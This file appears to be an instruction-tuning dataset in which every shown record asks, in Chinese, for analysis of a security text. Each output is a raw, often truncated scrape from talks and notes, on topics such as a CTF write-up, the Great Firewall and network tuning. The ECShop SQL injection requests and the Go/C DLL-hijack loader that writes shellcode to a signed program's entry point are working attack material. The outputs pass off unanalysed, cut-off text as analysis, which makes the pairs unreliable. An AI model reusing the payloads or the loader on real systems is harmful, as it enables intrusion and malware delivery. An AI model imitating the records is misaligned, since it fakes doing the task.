qua", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 网络调优 --- ## 压测工具 - [网络测试调试](./工具.md#网络测试调试) --- ## 常用调优配置 ```bash sysctl net.ipv4.tcp_tw_reuse=1 sysctl net.ipv4.ip_local_port_range=\"1024 65535\" sysctl net.ipv4.tcp_rmem=\"16384 262144 8388608\" sysctl net.ipv4.tcp_wmem=\"32768 524288 16777216\" sysctl net.core.somaxconn=8192 sysctl net.core.rmem_max=16777216 sysctl net.core.wmem_max=16777216 sysctl net.core.wmem_default=2097152 sysctl net.ipv4.tcp_max_tw_buckets=5000 sysctl net.ipv4.tcp_max_syn_backlog=10240 sysctl net.core.netdev_max_backlog=10240 sysctl net.netfilter.nf_conntrack_max=1000000 sysctl net.ipv4.netfilter.ip_conntrack_tcp_timeout_established=7200 sysctl net.core.default_qdisc=fq_codel sysctl net.ipv4.tcp_congestion_control=bbr sysctl net.ipv4.tcp_slow_start_after_idle=0 ``` --- ## Source & Reference * [Linux 网络调优内核网络栈参数篇](https://www.starduster.me/2020/03/02/linux-network-tuning-kernel-parameter/) * [Linux性能调优之 网络](https://lework.github.io/2020/02/20/network/)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nScripting #SWAG RISE OF THE HYPEBOTS Duct Couldnt buy anything due to bots Decided to enter the game in 2012 Unfortunately still in the game. Looks good tho? About Me Why Bots? We Built the Internet For Them. The Bots We Loved 1988 1994 1999 2007 First Internet Bot spotted on IRC AOL Releases WebCrawler IRCs first Malicious Botnet First large scale HTTP botnet Our (best) Internet [SEO] Google is not the only bot anymore. [HTML]Readable and Clean HTML is easy to parse [APIs] Speedy and Reliable [Capitalism] Purchasing should be easy. Test Driven Development 1. If youre writing tests, youre one evil genius moment away from becoming a bot reseller 2. If your site is using unit tests, youre making sure that your site will be easy to bot. CAPITALISM ENCOURAGES BAD BEHAVIOR Why We Bot Restricted supply increases demand for a heavily marketed product Speed run checkout system creates a problem that requires an optimal solution Optimal Solution: Computers using computers. Why They Bot Restricted supply increases demand for a heavily marketed product Buyers market allows for space for a grey market to emerge to resell product. Need a vast amount of restricted product for more profit Optimal Solution: Many computers using computers How Bots? Complex Systems Simple Answers Types of Bots Browser Based Bot  Mimics a user by loading a browser  Easier to script, and harder to detect  More expensive to scale Low Level Bot  Uses API calls to post directly.  Takes more initial upfront investment  Scale to thousands easily. Meet the Team! Monitor-Bot B Account-Bot C Buy-Bot D Sell-Bot I WRITE A TEST MAKE IT WORK simple_bot.avi A-B-C. A-ALWAYS, B-BE, C-CHECKING. ALWAYS BE CHECKING! SIMPLE MONITOR simple_monitor.avi goes here MAKE IT BETTER MAKE IT BETTER MAKE IT BETTER MAKE IT BETTER MAKE IT BETTER Run all those requests through a proxy rotating proxy. Post the monitor results to a chat Sell access to that chat for $$$ MONITOR FOR PROFIT monitor_bot.avi complicated_bot.avi MAKE IT BETTE", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTechnical Service Bulletin: FXR-08 Modifying GE/MACOM MASTR-III Group 2 (150.8 MHz  174 MHz) for Amateur Radio Applications (144  148 MHz) A FluX Research project in several phases Release Date: 04-01-2008 Last Update: v1.0 03-31-2008 By: Matt Krick, K3MK matt@kgmn.net Radio Model #: GE/MACOM MASTR-III Group 2 Repeater or Base, Combination Number SXS Warning: Please be aware that this document is currently a work in progress which may contain several omissions and typographical errors, continue reading at your own risk. Background: The following LBIs may be helpful: LBI38540D Mastr IIe / III UTILITY PROGRAM LBI38636C Mastr III CONVENIONAL BASE STATION Installation Manual LBI38550A Mastr II / III SITE EQUIPMENT POWER SUPPLY LBI38625A Mastr III EMERGENCY POWER OPTIONS LBI38754A Mastr III RF PACKAGE VHF GROUP 2 (150.8-174 MHz) LBI38637 Mastr III T/R SHELF 19D902839G1 LBI38640B VHF TRANSMITTER SYNTHESIZER MODULE 19D902780G1 LBI38641B VHF RECEIVER SYNTHESIZER MODULE 19D902781G1, G2 LBI38642B VHF RECEIVER FRONT END MODULE 19D902782G1, G2 LBI38643B 25kHz RECEIVER IF MODULE 19D902783G1 LBI39123 12.5/25KHZ RECEIVER IF MODULE 19D902783G7 LBI38764C EARLY SYSTEM MODULE 19D902590G1, G3, G5 LBI39176 LATE SYSTEM MODULE 19D902590G6 & G7 LBI38752B SWITCHING POWER SUPPLY MODULE 19D902589G2, 19D902961 LBI38531A 136-174 MHZ, 110 WATT POWER AMPLIFIER 19D902797G1, 19A70532P1, 344A3221P1, 19A705532P2, 19D902794G1, 19D902794, 19D902793 Phase 0: Preparations Make sure the station to be converted is in good working order on its original frequencies before attempting conversion to Amateur Radio use. Note that a Fault light on the Receiver Synthesizer Module may be the result of a missing External Reference Source. Verify in programming software and set source to internal if that is the case. About 90% of the screws in the MASTR-III T/R Frame are Torx T-15. The remaining are T-6, T-8, T-10 or Phillips #2. To tune the Receiver Front End module properly, I recommend access to a service monitor w", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Holey Beep PWN ## Description: > That's it, we have code execution on the fridge. You can already see the /secret_cake_recipe. Wintermuted's TODO list has mentioned that the door alarm on the fridge is sounding all the time. This is usually a sign of the Holey Beep vulnerability. Maybe we finally found a way to get a root shell. You can smell the cake metaphorically. ## Solution: This is a direct continuation of the previous challenge - [Fridge TODO list](Fridge_TODO_List.md). You might ask yourself - we already have a shell, why can't we just read the file? ```console $ cat /secret_cake_recipe cat: /secret_cake_recipe: Permission denied $ ls -al / total 84 drwxr-xr-x 22 user user 4096 Oct 24 19:10 . drwxr-xr-x 22 user user 4096 Oct 24 19:10 .. -rwxr-xr-x 1 nobody nogroup 0 Oct 24 19:04 .dockerenv drwxr-xr-x 2 nobody nogroup 4096 Oct 16 15:10 bin drwxr-xr-x 2 nobody nogroup 4096 Apr 12 2016 boot drwxr-xr-x 4 nobody nogroup 4096 Oct 24 19:04 dev drwxr-xr-x 42 nobody nogroup 4096 Oct 24 19:04 etc drwxr-xr-x 4 nobody nogroup 4096 Oct 24 19:04 home drwxr-xr-x 8 nobody nogroup 4096 Sep 13 2015 lib drwxr-xr-x 2 nobody nogroup 4096 Apr 17 2018 lib64 drwxr-xr-x 2 nobody nogroup 4096 Apr 17 2018 media drwxr-xr-x 2 nobody nogroup 4096 Apr 17 2018 mnt drwxr-xr-x 2 nobody nogroup 4096 Apr 17 2018 opt dr-xr-xr-x 137 nobody nogroup 0 Dec 2 21:22 proc drwx------ 2 nobody nogroup 4096 Apr 17 2018 root drwxr-xr-x 5 nobody nogroup 4096 Apr 17 2018 run drwxr-xr-x 2 nobody nogroup 4096 Oct 16 15:10 sbin -r-------- 1 admin nogroup 1257 Sep 26 15:44 secret_cake_recipe drwxr-xr-x 2 nobody nogroup 4096 Apr 17 2018 srv drwxr-xr-x 2 nobody nogroup 4096 Feb 5 2016 sys drwxrwxrwt 2 user user 40 Dec 2 21:22 tmp drwxr-xr-x 2 nobody nogroup 4096 Oct 24 19:04 todos drwxr-xr-x 10 nobody nogroup 4096 Apr 17 2018 usr drwxr-xr-x 11 nobody nogroup 4096 Apr 17 2018 var ``` We need admin permissions to read it, and we spawned a shell as user. As you might remember, when searching for the flag in the pr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAPK File Infection on Android System Bob Pan Mobile Security Research Engineer July 27, 2012 Who is Bob? Mobile Security Industry Trends Malware increasing on App Stores Chris Di Bona from Google, November 2011: virus companies are playing on your fears to try to sell you bs protection software for Android, RIM and IOS. They are charlatans and scammers. IF you work for a company selling virus protection for android, rim or IOS you should be ashamed of yourself. The barriers to spreading such a program from phone to phone are large and difficult enough to traverse when you have legitimate access to the phone, but this isnt independence day, a virus that might work on one device wont magically spread to the other. All the major vendors have app markets, and all the major vendors have apps that do bad things, are discovered, and are dropped from the markets. Industry Trends Googles Bouncer Googles Bouncer effective? Android Malware http://blog.trendmicro.com/how-big-will-the-android-malware-threat-be-in-2012/ Wheres the challenge? The Inside of an APK File  AndroidManifest.xml contains the meta information;  Package name & version  Activities  Services  classes.dex contains all the code for Dalvik Virtual Machine.  META-INF/ contains the certificate and signature. APK are signed zip files The AndroidManifest File Googles Binary xml File  Format is not documented  Tools for reading Binary xml files are readily available  Tools for writing Binary xml files are limited The Dex File Dalvik Executable Format  Format is well documented  Many modification tools available  asmdex  smali/baksmali  Dexmaker  APKs can only use 16 to 32MB of memory so a separate Dalvik VM should be started The META-INF/ Folder Certificate & Signature  Format is well documented  Many creation tools available  jarsigner from JDK  signapk from Android Source  Minor modifications must be done to run on an Android device Infection Demonstration Architecture of the Virus The Payload of the Virus The Loa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBook Review: A Tale of Two Sciences: Memoirs of a Dissident Scientist by Peter A. Sturrock (Exoscience: Palo Alto) 2009. by Richard Thieme A Tale of Two Sciences: Memoirs of a Dissident Scientist, by Dr. Peter A. Sturrock, is a personal work by the well-known Stanford physicist and astrophysicist, reflecting on the sometimes complementary, sometimes discordant threads of his professional lives: one as a conventional scientist, with a long list of respected publications, and one as an unconventional scientist who explored anomalous phenomena, in particular UFO phenomena. His conventional scientific career might be a surprise to those who know him only in relationship to UFO studies; it is recounted here in terms that any educated layman can understand  in fact, the simplicity and clarity of his explanations of, say, plasma physics or pulsars, are a testimony to his deep knowledge  one cant explain complex phenomena so clearly otherwise. And for readers who want to go a little deeper, there is a small bit of helpful math in appendices. His unconventional career, on the other hand, has resulted in the full spectrum of responses which unfortunately are familiar to all researchers in anomalies embarrassed smiles, curt dismissals, ridicule, the bemused shaking of a lot of heads  all of which tell the researcher that he or she is at best tolerated as an eccentric and at worst dismissed as a nut case. The two strands of his unconventional career consist of accumulated evidence, the content of his explorations, food for further thought and research, and his personal account of reactions to that work and in turn his reactions to those reactions over a lifetime. This is a memoir, not a scientific treatise, so it must be evaluated for what it tells us about the man and his internal journey as well as the rewards of a long career in orthodox scientific research. It is well-written, careful in its pronouncements, understated, eminently sane, and occasionally mind-boggling, especi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 类和模块 --- - https://www.kancloud.cn/imxieke/ruby-base/107295 --- # 类是什么 类class是面向对象中一个重要的术语 **类和实例** 类表示对象的种类Ruby 中的对象都一定属于某个类例如我们常说的数组对象数组实际上都是 `Array` 类的对象实例还有字符串对象实际上是 `String` 类的对象实例 相同类的对象所使用的方法也相同类就像是对象的雏形或设计图决定了对象的行为 我们在生成新的对象时一般会用到各个类的 `new` 方法例如使用 `Array.new` 方法可以生成新的数组对象 ```ruby ary = Array.new p ary #=> [] ``` > 像数组字符串这样的类也可以使用字面量像 `[1, 2, 3]``\"abc\"` 这样的写法来生成对象 当想知道某个对象属于哪个类时我们可以使用 `class` 方法 ```ruby ary = [] str = \"Hello world.\" p ary.class #=> Array p str.class #=> String ``` 当判断某个对象是否属于某个类时我们可以使用 `instance_of?` 方法 ```ruby ary = [] str = \"Hello world.\" p ary.instance_of?(Array) #=> true p str.instance_of?(String) #=> true p ary.instance_of?(String) #=> false p str.instance_of?(Array) #=> false ``` **继承** 我们把通过扩展已定义的类来创建新类称为继承 假设我们需要编写一个在屏幕中显示时间的小程序根据用户的喜好这个小程序能以模拟时钟或者电子时钟的方式显示 模拟时钟与电子时钟两者只是在时间的表现形式上不一样获取当前时间的方法以及闹钟等基本功能都是相同的因此我们可以首先定义一个拥有基本功能的时钟类然后再通过继承来分别创建模拟时钟类和电子时钟类 继承后创建的新类称为子类subclass被继承的类被称为父类superclass 通过继承我们可以实现以下事情 - 在不影响原有功能的前提下追加新功能 - 重定义原有功能使名称相同的方法产生不同的效果 - 在已有功能的基础上追加处理扩展已有功能 此外我们还可以利用继承来轻松地创建多个具有相似功能的类 `BasicObject` 类是 Ruby 中所有类的父类它定义了作为 Ruby 对象的最基本功能 > `BasicObject` 类是最最基础的类甚至连一般对象需要的功能都没有定义因此普通对象所需要的类一般都被定义为 `Object` 类字符串数组等都是 Object 类的子类 子类与父类的关系称为is-a 关系例如`String` 类与它的父类 `Object` 就是 is-a 关系 之前我们提到过查找对象所属的类时使用 `instance_of?` 方法而根据类的继承关系反向追查对象是否属于某个类时则可以使用 `is_a?` 方法 ``` str = \"This is a String.\" p str.is_a?(String) #=> true p str.is_a?(Object) #=> true ``` 顺便提一下由于 `instance_of?` 方法与 `is_a?` 方法都已经在 `Object` 类中定义过了因此普通的对象都可以使用这两个方法 # 类的创建 ```ruby class HelloWorld # class 关键字 def initialize(myname = \"Ruby\") # initialize 方法 @name = myname # 初始化实例变量 end def hello # 实例方法 puts \"Hello, world. I am #{@name}.\" end end bob = HelloWorld.new(\"Bob\") alice = HelloWorld.new(\"Alice\") ruby = HelloWorld.new bob.hello ``` **class 关键字** `class` 关键字在定义类时使用以下是 `class` 关键字的一般用法 ```ruby class 类名 类的定义 end ``` 类名的首字母必须大写 **initialize 方法** 在 `class` 关键字中定义的方法为该类的实例方法 其中名为 `initialize` 的方法比较特别使用 `new` 方法生成新的对象时`initialize` 方法会被调用同时 `new` 方法的参数也会被原封不动地传给 `initiali", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Defcamp CTF Finals 2017 Team: c7f.m0d3, psrok1, rev, shalom, lacky ### Table of contents * [State agency (web)](state_agency) * [Caesar favourite song (misc/crypto)](favourite_song) * [Audio captcha (misc)](audio_captcha) * [Adversarial (misc)](adversarial) * [Hack tac toe (web/crypto)](hack_tac_toe) * [Fedora shop (web)](fedora_shop)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPowerPwning: Post-Exploiting By Overpowering PowerShell Joe Bialek About Me  Joe Bialek  Security Engineer  Twitter: @JosephBialek  Blog: http://clymb3r.wordpress.com  GitHub: https://github.com/clymb3r PowerShell is Awesome  Provides access to the Win32 API  Doesnt write to disk when scripts are run on remote computers  Script runs inside PowerShell.exe or WsmProvHost.exe (when run remotely)  Dont have to execute suspicious or unsigned processes What I Want To Do With PowerShell  Run existing tools in PowerShell without rewriting them in PowerShell  Use existing tools but leverage PowerShells forensic benefits  Solution: Write a PowerShell script to reflectively load and execute PEs (EXE/DLL) in the PowerShell process How To Load A PE 1. Allocate memory for PE 2. Copy PE headers to memory 3. Copy sections to memory (.text, .data, etc.) 4. Perform base relocations on the sections loaded 5. Load DLLs the PE requires 6. Adjust memory permissions 7. Call the entry function  For DLL: Calls DllMain which lets the DLL know it is loaded  For EXE: Function which sets up the process, gets command line arguments and calls int main() DLL Specific Stuff  After loading DLL, call exported DLL functions  Remote PowerShell cant capture stdout, you wont see anything your program outputs  printf  cout  To capture output: Make the DLL function return a char* or wchar_t*  PowerShell can Marshal this pointer to a managed string and print the output Problems Reflectively Loading An EXE: Prevent PowerShell From Exiting  When EXE exits, it calls ExitProcess  PowerShell is the running process so it is killed by ExitProcess  I want the EXE to exit, not PowerShell  Solution:  Call the EXE entry function in its own thread  Overwrite ExitProcess function with a call to ExitThread Assembly To Overwrite ExitProcess ; Set a var to 1, let PS know exe is exiting mov rbx, 0x4141414141414141 mov [rbx], byte 0x01 ; Call exitthread instead of exitprocess sub rsp, 0xc0 and sp, 0xFFF0 ; Needed for stack a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFrom One Country - One Floppy to Startup Nation The story of the early days of the Israeli hacking community I We* * Unless otherwise stated #whoarewe + #whyarewehere 1975 1984 1988 1993 2011 2015 1977 1986 2004 2011 2013 Some of the people in our story Hacking Cracking Phreaking Carding 90s Terminology Hacking Cracking Phreaking Carding 90s Terminology Telephony + The BBS Scene The BBS Scene BBS Mischief The Story of the Ethics Group Going global Internet Timeline in US vs. Israel So we understand we need to take care of ourselves + + Phreaking 208057040540 TYMNET PCP OUTDIALS: A listing of Pc-Pursuit out-dials usuable on Tymnet o r most X.25 systems. These are very good quality outdi als for the most part. Compiled : 01/05/91 Author : Net Runner Editor : Net Runner System : TymNet PCPursuit Outdials Uses : Calling to most major North American cities Dialups : Multiple Tymnet dialups per LATA Port : 2400 bps, 7 bits, Even Pairity, 1 Stop Bit Emulation. : ANSI, TTY, Vt-52, Vt-100 3110 2010 0001 ( 300 baud) (Newark, NJ) 3110 2010 0301 (1200 baud) (NJNEW) 3110 2010 0022 (2400 baud) (E.C. 201) 3110 2020 0115 ( 300 baud) (Washington, DC) 3110 2020 0116 (1200 baud) (DCWAS) 3110 2020 0117 (2400 baud) (E.C. 202, 703, 301) 3110 2030 0105 ( 300 baud) (Hartford, CT) 3110 2030 0120 (1200 baud) (CTHAR) 3110 2030 0121 (2400 baud) (E.C. 203) Learning to Code Reverse Engineering Contributions to the Community Anti Debugging Tricks Anti Debugging Tricks EXCLUSIVE Not only code The Story of unAsi And the result And also UnTinyProg Hardware Copy Protection The Virus Scene: The Bad Guys Jerusalem Haifa Local Initiatives The Virus Scene: The Good Guys The Virus Scene: The Good Guys The Virus Scene: The Good Guys The Virus Scene: The Good Guys An Anecdote Carding CBI & TRW Trade vs. Use: Hacker Ethics Famous Busts Deri Schreibman (1991) Analyzer (1998, 2008, 2013) Michael HaEfrati (2005) The Trojan Horse story The Hacker from Ashkelon (2017) Recent History Epilogue Where are they now? !", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n用Golang编写 dll劫持的一些坑 (2) 源于知识星球的一个想法利用一些已知的dll劫持的程序作为\"模板\",自动生成白加黑的程序 我想用Golang编写劫持的dll这样也方便可以做成在线平台 当然dll加载模式不同劫持的方式也不同 我找到是vscode它的更新程序也有它官方的签名 看 inno_updater.exe 的导入表我只用实现它的5个函数就可以了 因为我想做成通用型的对于这种输入表导入的dll做劫持只需要在 DllMain 中获取主程序的入口点 然后将shellcode写入入口点之后主程序运行就会执行我们的shellcode了 C代码如下 测试过是能够正常使用的 但是把它转成Go的过程中踩了不少坑 C代码转换为Go 读取PE入口点用来写shellcode用Windows API GetModuleHandle 可以得到PE进程的内存地址根 据内存地址加减偏移就可以得到入口点 我原本使用了 github.com/Binject/debug/pe 库它里面有一个 pe.NewFileFromMemory() 函数可 以直接从内存中读取但是它的参数是需要一个 io 类型文件的io自身有很多api但是对内存的io 资料好少 最后找了很多资料发现只能自己实现io的接口 但问题来了 ReadAt 接口要求我们自己读完了就返回 io.EOF 我是从内存空间读的我不知道什么时 候读完 就这么纠结了好久虽然现在写的时候想到了我可以实现这个 ReadAt 长度我可以生成模板的时候 硬写进去但又感觉没必要因为我根据PE的偏移写好了 int WINAPI DllMain(HINSTANCE hInstance, DWORD fdwReason, PVOID pvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: hello_func(); break; case DLL_PROCESS_DETACH: break; } return TRUE; } void hello_func() DWORD baseAddress = (DWORD)GetModuleHandleA(NULL); PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)baseAddress; PIMAGE_NT_HEADERS32 ntHeader = (PIMAGE_NT_HEADERS32)(baseAddress + dosHeader->e_lfanew); DWORD entryPoint = (DWORD)baseAddress + ntHeader- >OptionalHeader.AddressOfEntryPoint; DWORD old; VirtualProtect(entryPoint, size, 0x40, &old); for(int i=0;i<size;i++){ *((PBYTE)entryPoint+i) = shellcode[i]; } VirtualProtect(entryPoint, size, old, &old);  type ReaderAt interface { ReadAt(p []byte, off int64) (n int, err error) } 直接就不用它的库了手动根据偏移去寻找入口点 Go实现DllMain DllMain是dll在创建或退出时的消息函数要把shellcode写入PE的入口点就必须在这里执行代码但 是Go里面没有这样相关的定义搜索资料有人说用 init() 函数可以我试了下 init() 函数执行 是在代码运行的时候加载的也就是pe运行了执行到了相关导出函数的时候会先执行 init() 代 码但是这个时候写shellcode到PE头部就已经没用了 最后发现了怎么做就是混编C和Go,而且比较麻烦 var ( kernel32 = syscall.NewLazyDLL(\"kernel32.dll\") getModuleHandle = kernel32.NewProc(\"GetModuleHandleW\") procVirtualProtect = kernel32.NewProc(\"VirtualProtect\") ) func GetModuleHandle() (handle uintptr) { ret, _, _ := getModuleHandle.Call(0) handle = ret return } // 将shellcode写入程序ep func loader_from_ep(shellcode []byte) { baseAddress := Ge", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n道高一尺牆高一丈東亞 網絡封鎖和反封鎖技術演進 介紹 蕭強 加大柏克萊分校逆權力實驗室 第一封電子郵件 (1987) : https://bit.ly/2NsTe2Q Across the Great Wall we can reach every corner in the world 中大國九互聯網關 https://bit.ly/2NsTe2Q 國家公共網絡監控系統俗稱中國網絡防火牆 The Great Fire Wall of China常用簡稱GFW 或牆 網絡封鎖的歷史背景 1999  國家信息化工作領導小組  組長: 吳邦國 GFW 成立的背景 https://bit.ly/2uOp7LL https://bit.ly/2LowL9P 網絡審查組織 https://bit.ly/2mrOU8F 國家計算機網絡與信息安全管理中心 CNCERT/CC (GFW https://bit.ly/2Lb6Mn6 中國國家防火牆之父方濱興 国家计算机网络与信息安全管理中心总工程师 2000-2002 https://bit.ly/2LoATGR 國家信息安全話語範式  通過國家意志法律來定義信息安全包括了內容安全和意識 形態安全  將煽動煽動煽動煽動捏造宣揚侮辱損害其他等加入定義為 所謂的網絡攻擊網絡垃圾網絡有害信息網絡安全威脅  在實現層面完全技術性中立性地看待信息安全對意識形態與信息科 學進行牢不可破的焊接 CNCERT/CC合作夥伴  違法和不良信息舉報中心 網信辦  國家計算機網絡入侵防範中心 中科院  國家計算機病毒應急處理中心 公安部科技部  國家反計算機入侵及防病毒研究中心 公安部  中國互聯網用戶反垃圾郵件中心中國互聯網協會 防火長城 GFW 的決策機制 https://bit.ly/2mrOU8F https://bit.ly/2NsTe2Q https://bit.ly/2JBa5hP 防火長城 GFW 的工作流程  封禁標準  封禁流程  封禁技術 GFW 重點封堵翻牆工具的條件特點 大規模使用 特定時期的特定使用 有明顯翻牆意圖的使用 被外圍GFW人員舉報的使用 防火長城 GFW 技術實施原則  主要是強調綜合平衡安全成本與風險如果風險不大 就沒有必要花太大的安全成本來做在這裡面需要強調 一點就是確保重點的如等級保護就是根據信息系統的 重要性來定級從而施加適當強度的保護----- 方濱興 五個層面解讀國家信息安全保障體系 防火長城的技術演進 GFW 技術結構: 入侵防 禦系統, 檢測-攻擊兩相 模型 域名劫持 IP封锁 关键字过滤阻断 HTTPS证书过滤 Censorship Technologies IP Blocking DNS Poisoning Keywords Filtering (TCP Reset) URL Filtering (HTTP Proxy, IR) 更多的封鎖行為  Application protocol parsing (deep packet inspection)  Participation in a circumvention system as a client  Scanning to discover proxies  Throttling connections  Temporary total shutdowns Measurement IP Blacklist DNS Blacklist Keyword, URL blacklist Categories subject to Internet filtering HIKINGGFW.ORG Categories subject to Internet filtering dns_bl: Domain Name polluted  Input : a list of Domain Names  Alexa.com Top 1M????  COM, NET, ORG, INFO  Test methods  Clustering:  pictwitter.com, twitter.computer.com => twitter.com ip_bl: IP addressed blocked?  Input: domain names or IP addresses  Output: IP reachable or not  Get the real IP address in China  dig +tcp -f blacklist_domain  HTTP connect  wget, curl,  Socket rst_bl: Keywords by TCP Reset Input: Keyword(", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# ECShop 4.x `collection_list` SQL injection References: - https://mp.weixin.qq.com/s/xHioArEpoAqGlHJPfq3Jiw - http://foreversong.cn/archives/1556 ## Vulnerable environment Execute following command to start a ECShop 4.0.6: ``` docker compose up -d ``` After server is started, browse the `http://your-ip:8080` to see the installation wizard. Follow the manual, fill in the database address as `mysql`, username and password as `root` and `root`. ## Exploit The principle of this vulnerability is similar to [xianzhi-2017-02-82239600](https://github.com/vulhub/vulhub/tree/master/ecshop/xianzhi-2017-02-82239600)arbitrary `insert_` function could be utilized to leverage the SQL injection. There are multiple `insert_` functions that can be utilizaed. For example, the `insert_user_account`: ``` GET /user.php?act=collection_list HTTP/1.1 Host: your-ip:8080 X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:\"user_id\";s:38:\"0'-(updatexml(1,repeat(user(),2),1))-'\";s:7:\"payment\";s:1:\"4\";}|45ea207d7a2b68c49582d2d22adf953a Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36 Cookie: ECS_ID=f7b1398a0fdc189b691a6f1c969911ac1eea8fca;ECS[password]=445ac05c4ae0555ed091bb977b08581f;ECS[user_id]=3;ECS[username]=demo;ECS[visit_times]=2;ECSCP_ID=1a8bddd69b3b81efbe441a185ac52e7d24852d87;PHPSESSID=bb2033d66975ff7c2be29896d2d4260c;real_ipd=172.18.0.1; Connection: close ``` ![](1.png) Notice that you should log in as a normal user first. Use `insert_pay_log` as a POC: ``` GET /user.php?act=collection_list HTTP/1.1 Host: 192.168.1.162:8080 X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953apay_log|s:44:\"1' and updatexml(1,repeat(user(),2),1) and '\";| Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36 Coo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploiting 0ld Mag-stripe Information with New Technology Salvador Mendoza Twitter: @Netxing Blog: salmg.net About Me  Security Researcher  Samsung Pay: Tokenized Numbers, Flaws and Issues @Netxing Analyzing previous talks/tools  Major Malfunction DEFCON 14 Magstripe Madness  Samy Kamkar MagSpoof - 2015  Weston Hecker DEFCON 24 Hacking Hotel Keys and Point of Sale Systems @Netxing Intro to Magnetic Stripe Information  Type of card capable of storing data by modifying the magnetism of tiny iron-based magnetic particles on a band of magnetic material on the card  TL;DR > Track1 = [UPPERCASE,numbers] Track 2/3 = Numbers Source: samy.pl @Netxing Magstripe Composition %B4929555123456789MALFUNCTION/MAJOR 0902201010000000000000970000000? @Netxing Magstripe info, Parity, and Waves @Netxing Magstripe info, Parity, and Waves @Netxing Magstripe Signal @Netxing Major Malfunction DEFCON 14 https://www.youtube.com/watch?v=ITihB1c3dHw @Netxing BlueSpoof Descendancy MagSpoof MagSpoofPI SamyKam First Prototypes https://www.samy.pl Designed PCB by @electronicats Weston Hecker - DEFCON 24 @Netxing Sound Amplifier @Netxing Raspberry Pi + Amplifier + Coil @Netxing Raspberry Pi - Demo @Netxing Bluetooth Technology @Netxing Bluetooth Speaker @Netxing Bluetooth Speaker @Netxing MagSpoof Cousin BlueSpoof MagSpoof Electronic Cats(@electronicats) design @Netxing BlueSpoof @Netxing BlueSpoof tool - Characteristics  Cheap < $20  Easy to implement  Escalable  3.7 V Battery  Fast transmission  Accurate @Netxing BlueSpoof - Demo https://www.youtube.com/watch?v=elzqLhLnCek @Netxing Multiple Targets? @Netxing Token 1 Token 2 Controlling Multiple Speakers? @Netxing Python Sound Device Library https://pypi.python.org/pypi/sounddevice Attack with Multiple Bluetooth Speakers? https://www.youtube.com/watch?v=5hInVNLUC8s @Netxing Demo Bonus Take-Away Project: iWey @Netxing + = SamyKam https://salmg.net/2017/01/16/samykam/ @Netxing Greetz, Hugs & Stuff Samy Kamkar (@samykamkar) Electronic Cats (@electronic", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nsuspend === 挂起shell的执行 ## 概要 ```shell suspend [-f] ``` ## 主要用途 - 挂起shell的执行直到收到`SIGCONT`信号 - 除非使用`-f`选项否则无法对`login shell`使用 ## 选项 ```shell -f 对login shell执行挂起操作 ``` ## 返回值 返回成功除非未开启作业控制或发生了错误 ## 例子 ```shell # 打开一个终端首先获取PID echo $$ # 执行挂起命令 suspend ``` ```shell # 再打开一个终端发送SIGCONT命令 kill -s SIGCONT PID # 此时之前的终端结束挂起状态可以正常交互 ``` ### 注意 1. `bash`的作业控制命令包括`bg fg kill wait disown suspend` 2. 该命令需要`set`选项`monitor`处于开启状态时才能执行查看作业控制状态输入`set -o`查看`monitor`行执行`set -o monitor`或`set -m`开启该选项 3. 该命令是bash内建命令相关的帮助信息请查看`help`命令", "category": "text_analysis", "source": "security_papers"}
